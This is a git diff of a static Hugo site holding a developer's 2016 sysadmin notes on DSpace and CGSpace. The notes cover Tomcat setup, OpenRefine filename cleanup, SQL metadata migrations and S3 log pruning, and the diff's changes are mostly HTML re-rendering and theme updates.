$ createuser --pwprompt dspacetest
$ createdb -O dspacetest --encoding=UNICODE dspacetest
@ -187,7 +187,7 @@ $ psql -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sq
</code></pre><ul>
<li>After building and running a <code>fresh_install</code> I symlinked the webapps into Tomcat&rsquo;s webapps folder:</li>
</ul>
<pre><code>$ mv /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/ROOT /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/ROOT.orig
<pre tabindex="0"><code>$ mv /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/ROOT /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/ROOT.orig
$ ln -sfv ~/dspace/webapps/xmlui /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/ROOT
$ ln -sfv ~/dspace/webapps/rest /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/rest
$ ln -sfv ~/dspace/webapps/jspui /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/jspui
@ -198,11 +198,11 @@ $ /opt/brew/Cellar/tomcat/8.0.30/bin/catalina start
<li>Add CATALINA_OPTS in <code>/opt/brew/Cellar/tomcat/8.0.30/libexec/bin/setenv.sh</code>, as this script is sourced by the <code>catalina</code> startup script</li>
<li>For example:</li>
</ul>
<pre><code>CATALINA_OPTS=&quot;-Djava.awt.headless=true -Xms2048m -Xmx2048m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>CATALINA_OPTS=&#34;-Djava.awt.headless=true -Xms2048m -Xmx2048m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8&#34;
</code></pre><ul>
<li>After verifying that the site is working, start a full index:</li>
</ul>
<pre><code>$ ~/dspace/bin/dspace index-discovery -b
<pre tabindex="0"><code>$ ~/dspace/bin/dspace index-discovery -b
</code></pre><h2 id="2016-02-08">2016-02-08</h2>
<ul>
<li>Finish cleaning up and importing ~400 DAGRIS items into CGSpace</li>
@ -216,7 +216,7 @@ $ /opt/brew/Cellar/tomcat/8.0.30/bin/catalina start
<li>Help Sisay with OpenRefine</li>
<li>Enable HTTPS on DSpace Test using Let&rsquo;s Encrypt:</li>
</ul>
<pre><code>$ cd ~/src/git
<pre tabindex="0"><code>$ cd ~/src/git
$ git clone https://github.com/letsencrypt/letsencrypt
$ cd letsencrypt
$ sudo service nginx stop
@ -231,15 +231,15 @@ $ ansible-playbook dspace.yml -l linode02 -t nginx,firewall -u aorth --ask-becom
<li>Getting more and more hangs on DSpace Test, seemingly random but also during CSV import</li>
<li>Logs don&rsquo;t always show anything right when it fails, but eventually one of these appears:</li>
</ul>
<pre><code>org.dspace.discovery.SearchServiceException: Error while processing facet fields: java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>org.dspace.discovery.SearchServiceException: Error while processing facet fields: java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>or</li>
</ul>
<pre><code>Caused by: java.util.NoSuchElementException: Timeout waiting for idle object
<pre tabindex="0"><code>Caused by: java.util.NoSuchElementException: Timeout waiting for idle object
</code></pre><ul>
<li>Right now DSpace Test&rsquo;s Tomcat heap is set to 1536m and we have quite a bit of free RAM:</li>
</ul>
<pre><code># free -m
<pre tabindex="0"><code># free -m
total used free shared buffers cached
Mem: 3950 3902 48 9 37 1311
-/+ buffers/cache: 2552 1397
@ -253,11 +253,11 @@ Swap: 255 57 198
<li>There are 1200 records that have PDFs, and will need to be imported into CGSpace</li>
<li>I created a <code>filename</code> column based on the <code>dc.identifier.url</code> column using the following transform:</li>
</ul>
<pre><code>value.split('/')[-1]
<pre tabindex="0"><code>value.split(&#39;/&#39;)[-1]
</code></pre><ul>
<li>Then I wrote a tool called <a href="https://gist.github.com/alanorth/2206f24483fe5f0454fc"><code>generate-thumbnails.py</code></a> to download the PDFs and generate thumbnails for them, for example:</li>
</ul>
<pre><code>$ ./generate-thumbnails.py ciat-reports.csv
<pre tabindex="0"><code>$ ./generate-thumbnails.py ciat-reports.csv
Processing 64661.pdf
&gt; Downloading 64661.pdf
&gt; Creating thumbnail for 64661.pdf
@ -278,13 +278,13 @@ Processing 64195.pdf
<li>Looking at CIAT&rsquo;s records again, there are some files linking to PDFs on Slide Share, Embrapa, UEA UK, and Condesan, so I&rsquo;m not sure if we can use those</li>
<li>265 items have dirty, URL-encoded filenames:</li>
</ul>
<pre><code>$ ls | grep -c -E &quot;%&quot;
<pre tabindex="0"><code>$ ls | grep -c -E &#34;%&#34;
265
</code></pre><ul>
<li>I suggest that we import ~850 or so of the clean ones first, then do the rest after I can find a clean/reliable way to decode the filenames</li>
<li>This python2 snippet seems to work in the CLI, but not so well in OpenRefine:</li>
</ul>
<pre><code>$ python -c &quot;import urllib, sys; print urllib.unquote(sys.argv[1])&quot; CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
<pre tabindex="0"><code>$ python -c &#34;import urllib, sys; print urllib.unquote(sys.argv[1])&#34; CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
</code></pre><ul>
<li>Merge pull requests for submission form theming (<a href="https://github.com/ilri/DSpace/pull/178">#178</a>) and missing center subjects in XMLUI item views (<a href="https://github.com/ilri/DSpace/pull/176">#176</a>)</li>
@ -294,7 +294,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
<ul>
<li>Turns out OpenRefine has an unescape function!</li>
</ul>
<pre><code>value.unescape(&quot;url&quot;)
<pre tabindex="0"><code>value.unescape(&#34;url&#34;)
</code></pre><ul>
<li>This turns the URLs into human-readable versions that we can use as proper filenames</li>
<li>Run web server and system updates on DSpace Test and reboot</li>
@ -302,7 +302,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
<li>Then you create a facet for blank values on each column, show the rows that have values for one and not the other, then transform each independently to have the contents of the other, with &ldquo;||&rdquo; in between</li>
<li>Work on Python script for parsing and downloading PDF records from <code>dc.identifier.url</code></li>
<li>To get filenames from <code>dc.identifier.url</code>, create a new column based on this transform: <code>forEach(value.split('||'), v, v.split('/')[-1]).join('||')</code></li>
<li>This also works for records that have multiple URLs (separated by &ldquo;||&quot;)</li>
<li>This also works for records that have multiple URLs (separated by &ldquo;||&rdquo;)</li>
</ul>
<h2 id="2016-02-17">2016-02-17</h2>
<ul>
@ -316,7 +316,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
<li>Turns out the &ldquo;bug&rdquo; in SAFBuilder isn&rsquo;t a bug, it&rsquo;s a feature that allows you to encode extra information like the destintion bundle in the filename</li>
<li>Also, it seems DSpace&rsquo;s SAF import tool doesn&rsquo;t like importing filenames that have accents in them:</li>
</ul>
<pre><code>java.io.FileNotFoundException: /usr/share/tomcat7/SimpleArchiveFormat/item_1021/CIAT_COLOMBIA_000075_Medición_de_palatabilidad_en_forrajes.pdf (No such file or directory)
<pre tabindex="0"><code>java.io.FileNotFoundException: /usr/share/tomcat7/SimpleArchiveFormat/item_1021/CIAT_COLOMBIA_000075_Medición_de_palatabilidad_en_forrajes.pdf (No such file or directory)
</code></pre><ul>
<li>Need to rename files to have no accents or umlauts, etc&hellip;</li>
<li>Useful custom text facet for URLs ending with &ldquo;.pdf&rdquo;: <code>value.endsWith(&quot;.pdf&quot;)</code></li>
@ -325,12 +325,12 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
<ul>
<li>To change Spanish accents to ASCII in OpenRefine:</li>
</ul>
<pre><code>value.replace('ó','o').replace('í','i').replace('á','a').replace('é','e').replace('ñ','n')
<pre tabindex="0"><code>value.replace(&#39;ó&#39;,&#39;o&#39;).replace(&#39;í&#39;,&#39;i&#39;).replace(&#39;á&#39;,&#39;a&#39;).replace(&#39;é&#39;,&#39;e&#39;).replace(&#39;ñ&#39;,&#39;n&#39;)
</code></pre><ul>
<li>But actually, the accents might not be an issue, as I can successfully import files containing Spanish accents on my Mac</li>
<li>On closer inspection, I can import files with the following names on Linux (DSpace Test):</li>
</ul>
<pre><code>Bitstream: tést.pdf
<pre tabindex="0"><code>Bitstream: tést.pdf
Bitstream: tést señora.pdf
Bitstream: tést señora alimentación.pdf
</code></pre><ul>
@ -353,7 +353,7 @@ Bitstream: tést señora alimentación.pdf
<li>Looking at the filenames for the CIAT Reports, some have some really ugly characters, like: <code>'</code> or <code>,</code> or <code>=</code> or <code>[</code> or <code>]</code> or <code>(</code> or <code>)</code> or <code>_.pdf</code> or <code>._</code> etc</li>
<li>It&rsquo;s tricky to parse those things in some programming languages so I&rsquo;d rather just get rid of the weird stuff now in OpenRefine:</li>
</ul>
<pre><code>value.replace(&quot;'&quot;,'').replace('_=_','_').replace(',','').replace('[','').replace(']','').replace('(','').replace(')','').replace('_.pdf','.pdf').replace('._','_')
<pre tabindex="0"><code>value.replace(&#34;&#39;&#34;,&#39;&#39;).replace(&#39;_=_&#39;,&#39;_&#39;).replace(&#39;,&#39;,&#39;&#39;).replace(&#39;[&#39;,&#39;&#39;).replace(&#39;]&#39;,&#39;&#39;).replace(&#39;(&#39;,&#39;&#39;).replace(&#39;)&#39;,&#39;&#39;).replace(&#39;_.pdf&#39;,&#39;.pdf&#39;).replace(&#39;._&#39;,&#39;_&#39;)
</code></pre><ul>
<li>Finally import the 1127 CIAT items into CGSpace: <a href="https://cgspace.cgiar.org/handle/10568/35710">https://cgspace.cgiar.org/handle/10568/35710</a></li>
<li>Re-deploy CGSpace with the Google Scholar fix, but I&rsquo;m waiting on the Atmire fixes for now, as the branch history is ugly</li>
@ -378,15 +378,15 @@ Bitstream: tést señora alimentación.pdf
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -28,7 +28,7 @@ Looking at issues with author authorities on CGSpace
For some reason we still have the index-lucene-update cron job active on CGSpace, but I&rsquo;m pretty sure we don&rsquo;t need it as of the latest few versions of Atmire&rsquo;s Listings and Reports module
Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -58,12 +58,12 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -110,7 +110,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<time datetime="2016-03-02T16:50:00+03:00">Wed Mar 02, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -128,7 +128,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<li>I identified one commit that causes the issue and let them know</li>
<li>Restart DSpace Test, as it seems to have crashed after Sisay tried to import some CSV or zip or something:</li>
</ul>
<pre><code>Exception in thread &quot;Lucene Merge Thread #19&quot; org.apache.lucene.index.MergePolicy$MergeException: java.io.IOException: No space left on device
<pre tabindex="0"><code>Exception in thread &#34;Lucene Merge Thread #19&#34; org.apache.lucene.index.MergePolicy$MergeException: java.io.IOException: No space left on device
</code></pre><h2 id="2016-03-08">2016-03-08</h2>
<ul>
<li>Add a few new filters to Atmire&rsquo;s Listings and Reports module (<a href="https://github.com/ilri/DSpace/issues/180">#180</a>)</li>
@ -175,7 +175,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<li>Help Sisay with some PostgreSQL queries to clean up the incorrect <code>dc.contributor.corporateauthor</code> field</li>
<li>I noticed that we have some weird values in <code>dc.language</code>:</li>
</ul>
<pre><code># select * from metadatavalue where metadata_field_id=37;
<pre tabindex="0"><code># select * from metadatavalue where metadata_field_id=37;
metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
-------------------+-------------+-------------------+------------+-----------+-------+-----------+------------+------------------
1942571 | 35342 | 37 | hi | | 1 | | -1 | 2
@ -215,7 +215,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<ul>
<li>Command used:</li>
</ul>
<pre><code>$ gm convert -trim -quality 82 -thumbnail x300 -flatten Descriptor\ for\ Butia_EN-2015_2021.pdf\[0\] cover.jpg
<pre tabindex="0"><code>$ gm convert -trim -quality 82 -thumbnail x300 -flatten Descriptor\ for\ Butia_EN-2015_2021.pdf\[0\] cover.jpg
</code></pre><ul>
<li>Also, it looks like adding <code>-sharpen 0x1.0</code> really improves the quality of the image for only a few KB</li>
</ul>
@ -261,7 +261,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<ul>
<li>Abenet is having problems saving group memberships, and she gets this error: <a href="https://gist.github.com/alanorth/87281c061c2de57b773e">https://gist.github.com/alanorth/87281c061c2de57b773e</a></li>
</ul>
<pre><code>Can't find method org.dspace.app.xmlui.aspect.administrative.FlowGroupUtils.processSaveGroup(org.dspace.core.Context,number,string,[Ljava.lang.String;,[Ljava.lang.String;,org.apache.cocoon.environment.wrapper.RequestWrapper). (resource://aspects/Administrative/administrative.js#967)
<pre tabindex="0"><code>Can&#39;t find method org.dspace.app.xmlui.aspect.administrative.FlowGroupUtils.processSaveGroup(org.dspace.core.Context,number,string,[Ljava.lang.String;,[Ljava.lang.String;,org.apache.cocoon.environment.wrapper.RequestWrapper). (resource://aspects/Administrative/administrative.js#967)
</code></pre><ul>
<li>I can reproduce the same error on DSpace Test and on my Mac</li>
<li>Looks to be an issue with the Atmire modules, I&rsquo;ve submitted a ticket to their tracker.</li>
@ -316,15 +316,15 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -32,7 +32,7 @@ After running DSpace for over five years I&rsquo;ve never needed to look in any
This will save us a few gigs of backup space we&rsquo;re paying for on S3
Also, I noticed the checker log has some errors we should pay attention to:
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -62,12 +62,12 @@ Also, I noticed the checker log has some errors we should pay attention to:
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -114,7 +114,7 @@ Also, I noticed the checker log has some errors we should pay attention to:
<time datetime="2016-04-04T11:06:00+03:00">Mon Apr 04, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -126,7 +126,7 @@ Also, I noticed the checker log has some errors we should pay attention to:
<li>This will save us a few gigs of backup space we&rsquo;re paying for on S3</li>
<li>Also, I noticed the <code>checker</code> log has some errors we should pay attention to:</li>
</ul>
<pre><code>Run start time: 03/06/2016 04:00:22
<pre tabindex="0"><code>Run start time: 03/06/2016 04:00:22
Error retrieving bitstream ID 71274 from asset store.
java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290601546459645925328536011917633626 (Too many open files)
at java.io.FileInputStream.open(Native Method)
@ -150,7 +150,7 @@ java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290
******************************************************
</code></pre><ul>
<li>So this would be the <code>tomcat7</code> Unix user, who seems to have a default limit of 1024 files in its shell</li>
<li>For what it&rsquo;s worth, we have been setting the actual Tomcat 7 process' limit to 16384 for a few years (in <code>/etc/default/tomcat7</code>)</li>
<li>For what it&rsquo;s worth, we have been setting the actual Tomcat 7 process&rsquo; limit to 16384 for a few years (in <code>/etc/default/tomcat7</code>)</li>
<li>Looks like cron will read limits from <code>/etc/security/limits.*</code> so we can do something for the tomcat7 user there</li>
<li>Submit pull request for Tomcat 7 limits in Ansible dspace role (<a href="https://github.com/ilri/rmg-ansible-public/pull/30">#30</a>)</li>
</ul>
@ -158,11 +158,11 @@ java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290
<ul>
<li>Reduce Amazon S3 storage used for logs from 46 GB to 6GB by deleting a bunch of logs we don&rsquo;t need!</li>
</ul>
<pre><code># s3cmd ls s3://cgspace.cgiar.org/log/ &gt; /tmp/s3-logs.txt
# grep checker.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
# grep cocoon.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
# grep handle-plugin.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
# grep solr.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
<pre tabindex="0"><code># s3cmd ls s3://cgspace.cgiar.org/log/ &gt; /tmp/s3-logs.txt
# grep checker.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
# grep cocoon.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
# grep handle-plugin.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
# grep solr.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
</code></pre><ul>
<li>Also, adjust the cron jobs for backups so they only backup <code>dspace.log</code> and some stats files (.dat)</li>
<li>Try to do some metadata field migrations using the Atmire batch UI (<code>dc.Species</code> → <code>cg.species</code>) but it took several hours and even missed a few records</li>
@ -171,7 +171,7 @@ java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290
<ul>
<li>A better way to move metadata on this scale is via SQL, for example <code>dc.type.output</code> → <code>dc.type</code> (their IDs in the metadatafieldregistry are 66 and 109, respectively):</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set metadata_field_id=109 where metadata_field_id=66;
<pre tabindex="0"><code>dspacetest=# update metadatavalue set metadata_field_id=109 where metadata_field_id=66;
UPDATE 40852
</code></pre><ul>
<li>After that an <code>index-discovery -bf</code> is required</li>
@ -182,7 +182,7 @@ UPDATE 40852
<li>Write shell script to do the migration of fields: <a href="https://gist.github.com/alanorth/72a70aca856d76f24c127a6e67b3342b">https://gist.github.com/alanorth/72a70aca856d76f24c127a6e67b3342b</a></li>
<li>Testing with a few fields it seems to work well:</li>
</ul>
<pre><code>$ ./migrate-fields.sh
<pre tabindex="0"><code>$ ./migrate-fields.sh
UPDATE metadatavalue SET metadata_field_id=109 WHERE metadata_field_id=66
UPDATE 40883
UPDATE metadatavalue SET metadata_field_id=202 WHERE metadata_field_id=72
@ -199,13 +199,13 @@ UPDATE 51258
<li>Looking at the DOI issue <a href="https://www.yammer.com/dspacedevelopers/#/Threads/show?threadId=678507860">reported by Leroy from CIAT a few weeks ago</a></li>
<li>It seems the <code>dx.doi.org</code> URLs are much more proper in our repository!</li>
</ul>
<pre><code>dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://dx.doi.org%';
<pre tabindex="0"><code>dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like &#39;http://dx.doi.org%&#39;;
count
-------
5638
(1 row)
dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://doi.org%';
dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like &#39;http://doi.org%&#39;;
count
-------
3
@ -221,7 +221,7 @@ dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and t
<ul>
<li>Looking at quality of WLE data (<code>cg.subject.iwmi</code>) in SQL:</li>
</ul>
<pre><code>dspacetest=# select text_value, count(*) from metadatavalue where metadata_field_id=217 group by text_value order by count(*) desc;
<pre tabindex="0"><code>dspacetest=# select text_value, count(*) from metadatavalue where metadata_field_id=217 group by text_value order by count(*) desc;
</code></pre><ul>
<li>Listings and Reports is still not returning reliable data for <code>dc.type</code></li>
<li>I think we need to ask Atmire, as their documentation isn&rsquo;t too clear on the format of the filter configs</li>
@ -231,11 +231,11 @@ dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and t
<li>I decided to keep the set of subjects that had <code>FMD</code> and <code>RANGELANDS</code> added, as it appears to have been requested to have been added, and might be the newer list</li>
<li>I found 226 blank metadatavalues:</li>
</ul>
<pre><code>dspacetest# select * from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspacetest# select * from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
</code></pre><ul>
<li>I think we should delete them and do a full re-index:</li>
</ul>
<pre><code>dspacetest=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspacetest=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
DELETE 226
</code></pre><ul>
<li>I deleted them on CGSpace but I&rsquo;ll wait to do the re-index as we&rsquo;re going to be doing one in a few days for the metadata changes anyways</li>
@ -281,7 +281,7 @@ DELETE 226
</li>
<li>Test metadata migration on local instance again:</li>
</ul>
<pre><code>$ ./migrate-fields.sh
<pre tabindex="0"><code>$ ./migrate-fields.sh
UPDATE metadatavalue SET metadata_field_id=109 WHERE metadata_field_id=66
UPDATE 40885
UPDATE metadatavalue SET metadata_field_id=203 WHERE metadata_field_id=76
@ -294,11 +294,11 @@ UPDATE metadatavalue SET metadata_field_id=215 WHERE metadata_field_id=106
UPDATE 3872
UPDATE metadatavalue SET metadata_field_id=217 WHERE metadata_field_id=108
UPDATE 46075
$ JAVA_OPTS=&quot;-Xms512m -Xmx512m -Dfile.encoding=UTF-8&quot; ~/dspace/bin/dspace index-discovery -bf
$ JAVA_OPTS=&#34;-Xms512m -Xmx512m -Dfile.encoding=UTF-8&#34; ~/dspace/bin/dspace index-discovery -bf
</code></pre><ul>
<li>CGSpace was down but I&rsquo;m not sure why, this was in <code>catalina.out</code>:</li>
</ul>
<pre><code>Apr 18, 2016 7:32:26 PM com.sun.jersey.spi.container.ContainerResponse logException
<pre tabindex="0"><code>Apr 18, 2016 7:32:26 PM com.sun.jersey.spi.container.ContainerResponse logException
SEVERE: Mapped exception to response: 500 (Internal Server Error)
javax.ws.rs.WebApplicationException
at org.dspace.rest.Resource.processFinally(Resource.java:163)
@ -328,7 +328,7 @@ javax.ws.rs.WebApplicationException
<ul>
<li>Get handles for items that are using a given metadata field, ie <code>dc.Species.animal</code> (105):</li>
</ul>
<pre><code># select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=105);
<pre tabindex="0"><code># select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=105);
handle
-------------
10568/10298
@ -338,26 +338,26 @@ javax.ws.rs.WebApplicationException
</code></pre><ul>
<li>Delete metadata values for <code>dc.GRP</code> and <code>dc.icsubject.icrafsubject</code>:</li>
</ul>
<pre><code># delete from metadatavalue where resource_type_id=2 and metadata_field_id=96;
<pre tabindex="0"><code># delete from metadatavalue where resource_type_id=2 and metadata_field_id=96;
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=83;
</code></pre><ul>
<li>They are old ICRAF fields and we haven&rsquo;t used them since 2011 or so</li>
<li>Also delete them from the metadata registry</li>
<li>CGSpace went down again, <code>dspace.log</code> had this:</li>
</ul>
<pre><code>2016-04-19 15:02:17,025 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
<pre tabindex="0"><code>2016-04-19 15:02:17,025 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
</code></pre><ul>
<li>I restarted Tomcat and PostgreSQL and now it&rsquo;s back up</li>
<li>I bet this is the same crash as yesterday, but I only saw the errors in <code>catalina.out</code></li>
<li>Looks to be related to this, from <code>dspace.log</code>:</li>
</ul>
<pre><code>2016-04-19 15:16:34,670 ERROR org.dspace.rest.Resource @ Something get wrong. Aborting context in finally statement.
<pre tabindex="0"><code>2016-04-19 15:16:34,670 ERROR org.dspace.rest.Resource @ Something get wrong. Aborting context in finally statement.
</code></pre><ul>
<li>We have 18,000 of these errors right now&hellip;</li>
<li>Delete a few more old metadata values: <code>dc.Species.animal</code>, <code>dc.type.journal</code>, and <code>dc.publicationcategory</code>:</li>
</ul>
<pre><code># delete from metadatavalue where resource_type_id=2 and metadata_field_id=105;
<pre tabindex="0"><code># delete from metadatavalue where resource_type_id=2 and metadata_field_id=105;
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=85;
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=95;
</code></pre><ul>
@ -369,7 +369,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<li>Migrate fields and re-deploy CGSpace with the new subject and type fields, run all system updates, and reboot the server</li>
<li>Field migration went well:</li>
</ul>
<pre><code>$ ./migrate-fields.sh
<pre tabindex="0"><code>$ ./migrate-fields.sh
UPDATE metadatavalue SET metadata_field_id=109 WHERE metadata_field_id=66
UPDATE 40909
UPDATE metadatavalue SET metadata_field_id=203 WHERE metadata_field_id=76
@ -387,7 +387,7 @@ UPDATE 46075
<li>Basically, this gives us the ability to use the latest upstream stable 9.3.x release (currently 9.3.12)</li>
<li>Looking into the REST API errors again, it looks like these started appearing a few days ago in the tens of thousands:</li>
</ul>
<pre><code>$ grep -c &quot;Aborting context in finally statement&quot; dspace.log.2016-04-20
<pre tabindex="0"><code>$ grep -c &#34;Aborting context in finally statement&#34; dspace.log.2016-04-20
21252
</code></pre><ul>
<li>I found a recent discussion on the DSpace mailing list and I&rsquo;ve asked for advice there</li>
